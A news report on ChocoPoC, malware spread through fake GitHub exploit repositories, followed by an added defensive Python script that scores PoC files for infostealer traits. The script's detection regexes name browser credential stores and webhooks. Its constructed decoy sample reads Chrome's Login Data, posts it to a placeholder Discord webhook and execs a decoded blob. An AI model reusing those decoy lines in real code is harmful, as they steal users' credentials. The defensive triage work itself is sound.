ChocoPoC RAT Targets Researchers With Fake Exploit Code
A new information-stealing trojan, tracked as ChocoPoC, has been found targeting vulnerability researchers through deceptive proof-of-concept (PoC) exploit repositories on GitHub. The repositories pose as working exploits for recently disclosed Common Vulnerabilities and Exposures (CVEs). When a researcher runs the code, ChocoPoC silently collects sensitive data, including saved passwords, browser cookies, and files from the victim's system. After exfiltrating that data, the malware opens a remote shell, giving the attackers persistent, unauthorized control of the compromised machine.
The distribution method abuses the trust vulnerability researchers place in PoC code shared on platforms such as GitHub. By posing as exploit demonstrations for "hot new CVEs," the attackers lure researchers into executing the malware. The tactic exploits the routine pressure researchers face to test and analyze new vulnerabilities quickly in order to understand their impact and build defenses. A compromised researcher workstation can serve as a foothold for wider network intrusion or for the theft of proprietary research, including unpublished exploits and findings.
While details regarding the initial discovery and attribution remain limited, ChocoPoC fits a growing pattern of social engineering aimed squarely at the security community. The malware's ability to steal a broad range of sensitive data and then establish persistent access underscores the risk to individuals and organizations involved in security research and development. Security professionals are advised to treat PoC code from unverified authors as untrusted regardless of where it is hosted; a GitHub repository with stars and a plausible README is not evidence that the code does what it claims. In practice that means reading the code before running it and looking for behaviour unrelated to the advertised bug (encoded or obfuscated payloads, access to browser credential and cookie stores, outbound connections to hosts other than the target), and executing PoCs only inside a disposable, network-monitored virtual machine rather than on a workstation that holds real credentials.
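The following static triage script is an added example, not code from the article or from any of the parties it describes, and it is not a signature for ChocoPoC or any other specific malware family. It implements the pre-execution review suggested above: it scans the source files of a downloaded PoC repository for indicators that have nothing to do with exploiting a target, such as browser credential-store paths, filesystem walks combined with outbound network calls, large base64-like blobs, and dynamic code execution, and scores each file. The rule names, weights, thresholds and both sample PoC files are constructed for illustration; the "malicious" sample contains no working payload, only the patterns a decoy exploit would exhibit.

```python
"""
Pre-execution triage for a downloaded PoC repository (constructed example).

The heuristics flag behaviour a legitimate exploit for a remote target rarely
needs: reading browser credential stores, walking the home directory, posting
to webhooks, and executing decoded blobs. A high score means "read this file
line by line in an isolated VM before running it", not "this is malware".
"""
import re
from collections import Counter
from typing import Dict, Tuple

# (rule name, weight, regex). Weights and patterns are illustrative assumptions.
RULES: Tuple[Tuple[str, int, re.Pattern], ...] = (
    ("dynamic_exec", 3, re.compile(
        r"\b(eval|exec)\s*\(|shell\s*=\s*True|os\.system\(|"
        r"powershell(\.exe)?\s+-(enc|encodedcommand)\b", re.I)),
    # a 120+ character base64-looking run is unusual in a readable PoC
    ("base64_blob", 2, re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")),
    ("browser_store", 4, re.compile(
        r"Login Data|Cookies|Local State|\.mozilla|User Data|Default[/\\]Network", re.I)),
    ("network_io", 1, re.compile(
        r"https?://|socket\.socket|requests\.(get|post)|urllib\.request|"
        r"discord(app)?\.com/api/webhooks", re.I)),
    ("file_walk", 1, re.compile(r"os\.walk\(|glob\.glob\(|rglob\(|expanduser\(", re.I)),
)


def scan_source(text: str) -> Counter:
    """Count hits per rule in one source file."""
    hits: Counter = Counter()
    for name, _weight, rx in RULES:
        hits[name] = len(rx.findall(text))
    return hits


def score(hits: Counter) -> int:
    """Weighted sum, capped per rule, plus a bonus for the exfiltration combo."""
    total = sum(weight * min(hits[name], 5) for name, weight, _rx in RULES)
    # Reading local files or credential stores *and* talking to the network
    # in the same file is the core infostealer pattern; weight it extra.
    if hits["network_io"] and (hits["file_walk"] or hits["browser_store"]):
        total += 5
    return total


def verdict(total: int) -> str:
    """Thresholds are illustrative; tune them on your own corpus of known-good PoCs."""
    if total >= 15:
        return "high"
    if total >= 6:
        return "review"
    return "low"


def triage(repo: Dict[str, str]) -> Dict[str, dict]:
    """repo maps a file path to its source text; returns a per-file report."""
    report = {}
    for path, text in repo.items():
        hits = scan_source(text)
        total = score(hits)
        report[path] = {"score": total, "verdict": verdict(total), "hits": dict(hits)}
    return report


# --- constructed sample repository -------------------------------------------
BLOB = "UEFZTE9BRF9QTEFDRUhPTERFUg" * 6  # 156-char filler standing in for an encoded payload

BENIGN_POC = r'''
import sys, requests
# constructed PoC stub: sends one crafted request to the target and reports the status
def check(target):
    r = requests.get(target + "/status", headers={"X-Probe": "A" * 64}, timeout=5)
    return r.status_code
if __name__ == "__main__":
    print(check(sys.argv[1]))
'''

MALICIOUS_POC = r'''
import os, base64, requests
# constructed decoy: an exploit-shaped function, followed by infostealer behaviour
def exploit(target):
    requests.post(target + "/api", data={"x": "A" * 64})
home = os.path.expanduser("~")
db = os.path.join(home, "AppData/Local/Google/Chrome/User Data/Default/Login Data")
loot = open(db, "rb").read() if os.path.exists(db) else b""
for root, dirs, files in os.walk(home):
    pass
requests.post("https://discord.com/api/webhooks/0/constructed", files={"f": loot})
exec(base64.b64decode("__BLOB__"))
'''.replace("__BLOB__", BLOB)

SAMPLE_REPO = {"poc/check.py": BENIGN_POC, "poc/exploit.py": MALICIOUS_POC}

if __name__ == "__main__":
    for path, entry in triage(SAMPLE_REPO).items():
        print(f"{entry['verdict']:>6}  score={entry['score']:<3} {path}  {entry['hits']}")
```

Run it against a cloned repository by replacing `SAMPLE_REPO` with a dict built from `pathlib.Path(repo).rglob("*.py")` (and whatever other source extensions the PoC uses). The point of the combination bonus is that a genuine exploit talks to the target and little else; a file that also enumerates the home directory or opens a browser profile deserves a manual read, even when every individual hit looks explainable.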
Original source — read the full reporting at the publisher:
Read on The Hacker News